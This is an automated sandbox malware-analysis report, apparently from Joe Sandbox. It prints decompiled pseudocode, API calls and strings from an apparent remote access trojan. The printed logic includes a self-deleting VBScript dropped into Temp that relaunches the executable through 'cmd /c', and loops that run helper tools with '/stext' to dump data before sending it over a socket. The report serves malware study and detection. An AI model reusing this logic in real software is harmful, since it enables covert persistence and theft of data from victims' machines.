                    • Instruction Fuzzy Hash: 7851B3716043015ACB05BB32C866ABE766A9F80349F00453FF682B72E2DF3D9949865E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040D608(void* __ebx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				char _v196;
                    				short _v716;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t36;
                    				void* _t37;
                    				void* _t40;
                    				void* _t54;
                    				void* _t67;
                    				void* _t68;
                    				void* _t79;
                    				void* _t137;
                    
                    				_t79 = __ebx;
                    				E00412659();
                    				_t36 = E0040247C();
                    				_t37 = E00401FAB(0x474320);
                    				_t40 = E004132A6(E00401FAB(0x4742d8), "exepath",  &_v716, 0x208, _t37, _t36);
                    				_t141 = _t40;
                    				if(_t40 == 0) {
                    					GetModuleFileNameW(0,  &_v716, 0x208);
                    				}
                    				E00403014(_t79,  &_v124, E0041B6F3( &_v52, E0041B40D( &_v76)), 0, _t137, _t141, L".vbs");
                    				E00401F09();
                    				E00401FD8();
                    				E0040431D(_t79,  &_v100, E00403014(_t79,  &_v76, E0040417E(_t79,  &_v52, _t42, _t137, E0043BA8F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
                    				E00401F09();
                    				E00401F09();
                    				E00401F86(_t79,  &_v28);
                    				_t54 = E0040417E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
                    				E0040325D(E00403014(_t79,  &_v76, E00402FA5( &_v52, E00403014(_t79,  &_v148, E0040417E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				L00408F79(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                    				_t67 = E00401F04( &_v100);
                    				_t68 = E0040247C();
                    				E00401F04( &_v28);
                    				if(E0041BE86(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401F04( &_v100), 0x46b928, 0x46b928, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401F09();
                    				E00401F09();
                    				return E00401F09();
                    			}






















                    0x0040d608
                    0x0040d613
                    0x0040d61f
                    0x0040d627
                    0x0040d64b
                    0x0040d655
                    0x0040d657
                    0x0040d662
                    0x0040d662
                    0x0040d684
                    0x0040d68d
                    0x0040d695
                    0x0040d6c7
                    0x0040d6d0
                    0x0040d6d8
                    0x0040d6e0
                    0x0040d6f5
                    0x0040d73a
                    0x0040d742
                    0x0040d74a
                    0x0040d755
                    0x0040d760
                    0x0040d76b
                    0x0040d778
                    0x0040d781
                    0x0040d78a
                    0x0040d796
                    0x0040d7a8
                    0x0040d7cd
                    0x0040d7cd
                    0x0040d7d6
                    0x0040d7de
                    0x0040d7f0

                    APIs
                      • Part of subcall function 00412659: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F6D1), ref: 00412669
                      • Part of subcall function 00412659: WaitForSingleObject.KERNEL32(000000FF), ref: 0041267C
                      • Part of subcall function 004132A6: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742D8), ref: 004132C2
                      • Part of subcall function 004132A6: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 004132DB
                      • Part of subcall function 004132A6: RegCloseKey.KERNEL32(00000000), ref: 004132E6
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D662
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046B928,0046B928,00000000), ref: 0040D7C1
                    • ExitProcess.KERNEL32 ref: 0040D7CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: CG$""", 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-3570261012
                    • Opcode ID: c2f438d14fed0ebe2f8db83c5d44e1567d86181aab4162aae3ad0ac61ef54361
                    • Instruction ID: b0da21977d16a53d6d8bd743fa1ea48d42f4b9976e417a3c6d9385d8b841dffc
                    • Opcode Fuzzy Hash: c2f438d14fed0ebe2f8db83c5d44e1567d86181aab4162aae3ad0ac61ef54361
                    • Instruction Fuzzy Hash: D34129319001155ACB15FA62DC56DEEB779AF50309F10017FB10AB30E2EF785E8ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E00450010(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				intOrPtr* _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t105;
                    				char _t195;
                    				char _t210;
                    				signed int _t213;
                    				void* _t224;
                    				char* _t226;
                    				signed int _t227;
                    				signed int _t231;
                    				signed int _t232;
                    				void* _t234;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t243;
                    				signed int _t244;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t247;
                    				signed int _t248;
                    				signed int _t249;
                    				signed int _t250;
                    				signed int _t251;
                    				signed int _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				char* _t257;
                    
                    				_t224 = __edx;
                    				_t210 = _a4;
                    				_v16 = 0;
                    				_v28 = _t210;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                    					_t234 = E004454E5(0, 1, 0x50);
                    					_v8 = _t234;
                    					E00446172(0);
                    					if(_t234 != 0) {
                    						_t227 = E004454E5(0, 1, 4);
                    						_v12 = _t227;
                    						E00446172(0);
                    						if(_t227 != 0) {
                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                    								_t213 = 0x14;
                    								memcpy(_v8, 0x470188, _t213 << 2);
                    								L25:
                    								_t236 = _v8;
                    								_t231 = _v16;
                    								 *_t236 =  *( *(_t210 + 0x88));
                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                    								 *_v12 = 1;
                    								if(_t231 != 0) {
                    									 *_t231 = 1;
                    								}
                    								goto L27;
                    							}
                    							_t232 = E004454E5(0, 1, 4);
                    							_v16 = _t232;
                    							E00446172(0);
                    							if(_t232 != 0) {
                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                    								_t14 = _t234 + 0xc; // 0xc
                    								_t237 = E00452884(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                    								_t238 = _t237 | E00452884(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                    								_t239 = _t238 | E00452884(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                    								_t240 = _t239 | E00452884(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                    								_v20 = _v8 + 0x1c;
                    								_t241 = _t240 | E00452884(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                    								_t242 = _t241 | E00452884(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                    								_t243 = _t242 | E00452884(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                    								_t244 = _t243 | E00452884(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                    								_t245 = _t244 | E00452884(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                    								_t246 = _t245 | E00452884(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                    								_t247 = _t246 | E00452884(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                    								_t248 = _t247 | E00452884(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                    								_t249 = _t248 | E00452884(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                    								_t250 = _t249 | E00452884(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                    								_t251 = _t250 | E00452884(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                    								_t252 = _t251 | E00452884(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                    								_t253 = _t252 | E00452884(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                    								_t254 = _t253 | E00452884(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                    								_t255 = _t254 | E00452884(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                    								_t256 = _t255 | E00452884(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                    								if((E00452884(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                    									_t226 =  *_v20;
                    									while( *_t226 != 0) {
                    										_t195 =  *_t226;
                    										if(_t195 < 0x30 || _t195 > 0x39) {
                    											if(_t195 != 0x3b) {
                    												goto L17;
                    											}
                    											_t257 = _t226;
                    											do {
                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                    												_t257 = _t257 + 1;
                    											} while ( *_t257 != 0);
                    										} else {
                    											 *_t226 = _t195 - 0x30;
                    											L17:
                    											_t226 = _t226 + 1;
                    										}
                    									}
                    									goto L25;
                    								}
                    								E0044FF12(_v8);
                    								E00446172(_v8);
                    								E00446172(_v12);
                    								E00446172(_v16);
                    								goto L4;
                    							}
                    							E00446172(_t234);
                    							E00446172(_v12);
                    							L7:
                    							goto L4;
                    						}
                    						E00446172(_t234);
                    						goto L7;
                    					}
                    					L4:
                    					return 1;
                    				} else {
                    					_t231 = 0;
                    					_v12 = 0;
                    					_t236 = 0x470188;
                    					L27:
                    					_t105 =  *(_t210 + 0x84);
                    					if(_t105 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t105 | 0xffffffff) == 0) {
                    							E00446172( *(_t210 + 0x88));
                    							E00446172( *((intOrPtr*)(_t210 + 0x7c)));
                    						}
                    					}
                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                    					 *(_t210 + 0x84) = _t231;
                    					 *(_t210 + 0x88) = _t236;
                    					return 0;
                    				}
                    			}












































                    0x00450010
                    0x00450019
                    0x00450020
                    0x00450023
                    0x00450026
                    0x0045002f
                    0x00450051
                    0x00450055
                    0x00450058
                    0x00450062
                    0x00450075
                    0x00450079
                    0x0045007c
                    0x00450086
                    0x00450098
                    0x0045032e
                    0x0045032f
                    0x00450331
                    0x00450339
                    0x0045033d
                    0x00450342
                    0x0045034d
                    0x00450359
                    0x00450365
                    0x00450371
                    0x00450377
                    0x0045037b
                    0x0045037d
                    0x0045037d
                    0x00000000
                    0x0045037b
                    0x004500a7
                    0x004500ab
                    0x004500ae
                    0x004500b8
                    0x004500cc
                    0x004500d2
                    0x004500e7
                    0x004500fb
                    0x00450112
                    0x0045012c
                    0x00450134
                    0x00450146
                    0x0045015d
                    0x00450174
                    0x0045018e
                    0x004501a5
                    0x004501bc
                    0x004501d3
                    0x004501ed
                    0x00450204
                    0x0045021b
                    0x00450232
                    0x0045024c
                    0x00450263
                    0x0045027a
                    0x00450291
                    0x004502ab
                    0x004502c7
                    0x004502f5
                    0x00450308
                    0x004502f9
                    0x004502fd
                    0x00450311
                    0x00000000
                    0x00000000
                    0x00450313
                    0x00450315
                    0x00450318
                    0x0045031a
                    0x0045031d
                    0x00450303
                    0x00450305
                    0x00450307
                    0x00450307
                    0x00450307
                    0x004502fd
                    0x00000000
                    0x0045030d
                    0x004502cd
                    0x004502d3
                    0x004502dc
                    0x004502e5
                    0x00000000
                    0x004502ea
                    0x004500bb
                    0x004500c4
                    0x0045008e
                    0x00000000
                    0x0045008e
                    0x00450089
                    0x00000000
                    0x00450089
                    0x00450064
                    0x00000000
                    0x00450039
                    0x00450039
                    0x0045003b
                    0x0045003e
                    0x0045037f
                    0x0045037f
                    0x00450387
                    0x00450389
                    0x00450389
                    0x00450391
                    0x00450396
                    0x0045039a
                    0x004503a2
                    0x004503aa
                    0x004503b0
                    0x0045039a
                    0x004503b4
                    0x004503b9
                    0x004503bf
                    0x00000000
                    0x004503bf

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 6202c7deda48e1626fea1e58d0bb9a9ae74781aade1445d92b12529a895d4fd5
                    • Instruction ID: eff7aa69a0f14bbbb5a5849cdd44f8a3b331375e90b0fbecb2878cf49f08a1c9
                    • Opcode Fuzzy Hash: 6202c7deda48e1626fea1e58d0bb9a9ae74781aade1445d92b12529a895d4fd5
                    • Instruction Fuzzy Hash: 7EC18376D00205AFEB20DBA9CC42FEE77F8AB09745F14016AFE04EB283D6B499458764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00404E26(void* __edx) {
                    				void* __ebx;
                    				void* __ecx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t29;
                    				int _t32;
                    				long _t33;
                    				long _t36;
                    				void* _t44;
                    				void* _t48;
                    				void* _t50;
                    				void* _t51;
                    
                    				_t48 = __edx;
                    				_t51 = WaitForSingleObject;
                    				_t50 = _t44;
                    				_t1 = _t50 + 0x68; // 0x0
                    				_t29 = WaitForSingleObject( *_t1, 0xffffffff);
                    				if( *(_t50 + 4) != 0xffffffff) {
                    					_t5 = _t50 + 4; // 0xffffffff
                    					__imp__#3( *_t5);
                    					if(_t29 == 0) {
                    						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                    					}
                    					_t45 = _t50;
                    					if(E004046F3(_t50) != 0) {
                    						E004050E4(_t45, _t51, 1);
                    					}
                    					if( *((char*)(_t50 + 1)) != 0) {
                    						_t9 = _t50 + 0x70; // 0x0
                    						_t33 = WaitForSingleObject( *_t9, 0xffffffff);
                    						_t10 = _t50 + 0x50; // 0x0
                    						E004206BE(_t33, CloseHandle,  *_t10, _t48, SetEvent, _t50);
                    						_t11 = _t50 + 0x70; // 0x0
                    						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
                    						SetEvent( *_t11);
                    						_t14 = _t50 + 0x6c; // 0x0
                    						_t36 = WaitForSingleObject( *_t14, 0xffffffff);
                    						_t15 = _t50 + 0x4c; // 0x0
                    						E004206BE(_t36, CloseHandle,  *_t15, _t48, SetEvent, _t50);
                    						_t16 = _t50 + 0x6c; // 0x0
                    						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
                    						SetEvent( *_t16);
                    						_t19 = _t50 + 0x70; // 0x0
                    						CloseHandle( *_t19);
                    						_t20 = _t50 + 0x6c; // 0x0
                    						CloseHandle( *_t20);
                    						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
                    						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
                    					}
                    					_t25 = _t50 + 0x68; // 0x0
                    					SetEvent( *_t25);
                    					_t26 = _t50 + 0x68; // 0x0
                    					_t32 = CloseHandle( *_t26);
                    				} else {
                    					_t3 = _t50 + 0x68; // 0x0
                    					SetEvent( *_t3);
                    					_t4 = _t50 + 0x68; // 0x0
                    					_t32 = CloseHandle( *_t4);
                    				}
                    				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
                    				return _t32;
                    			}
















                    0x00404e26
                    0x00404e29
                    0x00404e31
                    0x00404e35
                    0x00404e38
                    0x00404e3e
                    0x00404e57
                    0x00404e5a
                    0x00404e62
                    0x00404e64
                    0x00404e64
                    0x00404e68
                    0x00404e71
                    0x00404e75
                    0x00404e75
                    0x00404e8a
                    0x00404e8e
                    0x00404e91
                    0x00404e93
                    0x00404e96
                    0x00404e9b
                    0x00404e9e
                    0x00404ea2
                    0x00404ea6
                    0x00404ea9
                    0x00404eab
                    0x00404eae
                    0x00404eb3
                    0x00404eb6
                    0x00404eba
                    0x00404ebc
                    0x00404ebf
                    0x00404ec1
                    0x00404ec4
                    0x00404ec6
                    0x00404eca
                    0x00404eca
                    0x00404ece
                    0x00404ed1
                    0x00404ed3
                    0x00404ed6
                    0x00404e40
                    0x00404e40
                    0x00404e43
                    0x00404e49
                    0x00404e4c
                    0x00404e4c
                    0x00404ed8
                    0x00404ee1

                    APIs
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00473EE0,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E38
                    • SetEvent.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E43
                    • CloseHandle.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E4C
                    • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E91
                    • SetEvent.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404EA2
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404EA9
                    • SetEvent.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404EBA
                    • CloseHandle.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404EBF
                    • CloseHandle.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404EC4
                    • SetEvent.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404ED1
                    • CloseHandle.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404ED6
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                    • String ID:
                    • API String ID: 3658366068-0
                    • Opcode ID: 0bd99f96d97950e2fcc241975f6516a9069ee8f0966813be3e89c00f28c1d8db
                    • Instruction ID: 2e3ee91eef2a7fed7af24ed514264b4834c9b9d65d42d3489eea17716470d4fc
                    • Opcode Fuzzy Hash: 0bd99f96d97950e2fcc241975f6516a9069ee8f0966813be3e89c00f28c1d8db
                    • Instruction Fuzzy Hash: F021EA71105B04AFDB216B26DC49B17BBA1FF40326F104A2DE2E221AF1CF75A851DB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004128BD() {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t165;
                    				void* _t168;
                    				void* _t174;
                    				void* _t180;
                    				void* _t186;
                    				void* _t192;
                    				void* _t198;
                    				void* _t212;
                    				void* _t217;
                    				void* _t222;
                    				void* _t223;
                    				void* _t254;
                    				void* _t255;
                    				void* _t291;
                    				void* _t292;
                    				void* _t293;
                    				void* _t294;
                    				char _t298;
                    				intOrPtr _t300;
                    				void* _t474;
                    				void* _t494;
                    				void* _t500;
                    				void* _t504;
                    				void* _t505;
                    				void* _t506;
                    				void* _t507;
                    				intOrPtr _t519;
                    
                    				GetModuleFileNameW(0, _t505 + 0x178, 0x104);
                    				E004020DF(_t291, _t505 + 0xf8);
                    				E004020DF(_t291, _t505 + 0xe0);
                    				E004020DF(_t291, _t505 + 0xc8);
                    				_t494 = Sleep;
                    				_t504 = 0;
                    				do {
                    					 *((char*)(_t505 + 0x1b)) = 0;
                    					 *((char*)(_t505 + 0x19)) = 0;
                    					 *((char*)(_t505 + 0x1a)) = 0;
                    					E0040D7F1(_t505 + 0xb4, 0x30, E00401FAB(E0041B40D(_t505 + 0x1c)));
                    					E00401FD8();
                    					E0040D7F1(_t505 + 0x9c, 0x30, E00401FAB(E0041B40D(_t505 + 0x1c)));
                    					E00401FD8();
                    					_t165 = E00401FAB(E0041B40D(_t505 + 0x1c));
                    					_t459 = 0x30;
                    					E0040D7F1(_t505 + 0x84, 0x30, _t165);
                    					E00401FD8();
                    					_t292 = 0;
                    					while(1) {
                    						_t168 = E00401FAB(_t505 + 0x3c8);
                    						_t174 = E00401F04(E00403014(_t292, _t505 + 0x20, E0040431D(_t292, _t505 + 0x58, E004042FC(_t292, _t505 + 0x74, _t505 + 0x194, _t504, 0, E0040417E(_t292, _t505 + 0x38, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0xb4), _t494, _t504, 0, "\""));
                    						_t459 = _t168;
                    						 *((char*)(_t505 + 0x16)) = E00417FFD(_t174);
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						if( *((char*)(_t505 + 0x16)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t292 = _t292 + 1;
                    						if(_t292 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t293 = 0;
                    					while(1) {
                    						_t180 = E00401FAB(_t505 + 0x3f8);
                    						_t186 = E00401F04(E00403014(_t293, _t505 + 0x3c, E0040431D(_t293, _t505 + 0x70, E004042FC(_t293, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040417E(_t293, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x9c), _t494, _t504, 0, "\""));
                    						_t459 = _t180;
                    						 *((char*)(_t505 + 0x18)) = E00417FFD(_t186);
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						if( *((char*)(_t505 + 0x18)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t293 = _t293 + 1;
                    						if(_t293 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t294 = 0;
                    					while(1) {
                    						_t192 = E00401FAB(_t505 + 0x3e0);
                    						_t198 = E00401F04(E00403014(_t294, _t505 + 0x3c, E0040431D(_t294, _t505 + 0x70, E004042FC(_t294, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040417E(_t294, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x84), _t494, _t504, 0, "\""));
                    						_t459 = _t192;
                    						 *((char*)(_t505 + 0x17)) = E00417FFD(_t198);
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						if( *((char*)(_t505 + 0x17)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t294 = _t294 + 1;
                    						if(_t294 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t519 =  *((intOrPtr*)(_t505 + 0x16));
                    					_t60 = (0 | _t519 == 0x00000000) + 1; // 0x1
                    					_t62 = ( !=  ? _t519 == 0 : _t60) + 1; // 0x2
                    					_t296 =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                    					_t500 = 0;
                    					 *((intOrPtr*)(_t505 + 0x34)) =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                    					while(1) {
                    						E00401F04(_t505 + 0xb0);
                    						if(E0041BF1A(_t505 + 0xf8) != 0) {
                    							DeleteFileW(E00401F04(_t505 + 0xb0));
                    						}
                    						E00401F04(_t505 + 0x80);
                    						if(E0041BF1A(_t505 + 0xe0) == 0) {
                    							_t298 =  *((intOrPtr*)(_t505 + 0x19));
                    						} else {
                    							_t298 = 1;
                    							 *((char*)(_t505 + 0x19)) = 1;
                    							DeleteFileW(E00401F04(_t505 + 0x80));
                    						}
                    						E00401F04(_t505 + 0x98);
                    						_t471 = _t505 + 0xc8;
                    						if(E0041BF1A(_t505 + 0xc8) != 0) {
                    							 *((char*)(_t505 + 0x1a)) = 1;
                    							DeleteFileW(E00401F04(_t505 + 0x98));
                    						}
                    						if(_t298 != 0 && _t298 != 0 &&  *((char*)(_t505 + 0x1a)) != 0) {
                    							break;
                    						}
                    						Sleep(0x1f4);
                    						_t500 = _t500 + 1;
                    						if(_t500 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t212 = E00406A4F();
                    					_t300 =  *((intOrPtr*)(_t505 + 0x34));
                    					if(_t212 == 0 || E00406A4F() == 0 || E00406A4F() == 0) {
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    					} else {
                    						goto L25;
                    					}
                    					L28:
                    					E0040B779(_t300, _t505 + 0x118, _t471, _t494, _t504, 0x2710, 0);
                    					_t217 = E00401F04(_t505 + 0x110);
                    					_t506 = _t505 - 0x18;
                    					E004020F6(_t300, _t506, _t471, _t533, _t506 + 0x428);
                    					E00413036(_t506 + 0x50, _t217, _t217, _t504);
                    					_t507 = _t506 + 0x18;
                    					E00401F09();
                    					_t222 = E00405B05("0");
                    					_t474 = _t507 + 0x110;
                    					_t534 = _t222;
                    					if(_t222 == 0) {
                    						_t223 = E0041B7B3(_t300, _t507 + 0x1c, _t474);
                    						E00402EA1(_t508, E00402F10(_t300, _t508 + 0x190, E00402F10(_t300, _t508 + 0x17c, E00402F10(_t300, _t508 + 0x168, E00402F10(_t300, _t508 + 0x154, E00402F10(_t300, _t508 + 0x68, E00402F10(_t300, _t508 + 0x9c, E00402F31(_t507 - 0x18 + 0x68, _t507 - 0x18 + 0x3c8, _t504, 0x473ec8), _t504, __eflags, _t508 + 0x128), _t504, __eflags, 0x473ec8), _t504, __eflags, _t508 + 0x108), _t504, __eflags, 0x473ec8), _t504, __eflags, _t508 + 0xe8), _t504, __eflags, 0x473ec8), _t223);
                    						_push(0x6a);
                    						E00404AA1(0x474418, _t233, __eflags);
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    					} else {
                    						_t254 = E0041B7B3(_t300, _t507 + 0x170, _t474);
                    						_t508 = _t507 - 0x18;
                    						_t255 = E0041B623(_t300, _t507 - 0x18 + 0x170, _t300);
                    						E00402EA1(_t508, E00402F10(_t300, _t508 + 0x58, E00402EA1(_t508 + 0x8c, E00402F10(_t300, _t508 + 0x78, E00402F10(_t300, _t508 + 0x48, E00402F10(_t300, _t508 + 0xe0, E00402F10(_t300, _t508 + 0xcc, E00402F10(_t300, _t508 + 0xb8, E00402F10(_t300, _t508 + 0x164, E00402F31(_t508 + 0x180, _t508 + 0x3f0, _t504, 0x473ec8), _t504, _t534, _t508 + 0x130), _t504, _t534, 0x473ec8), _t504, _t534, _t508 + 0x110), _t504, _t534, 0x473ec8), _t504, _t534, _t508 + 0xf0), _t504, _t534, 0x473ec8), _t255), _t504, _t534, 0x473ec8), _t254);
                    						_push(0x69);
                    						E00404AA1(0x474418, _t267, _t534);
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
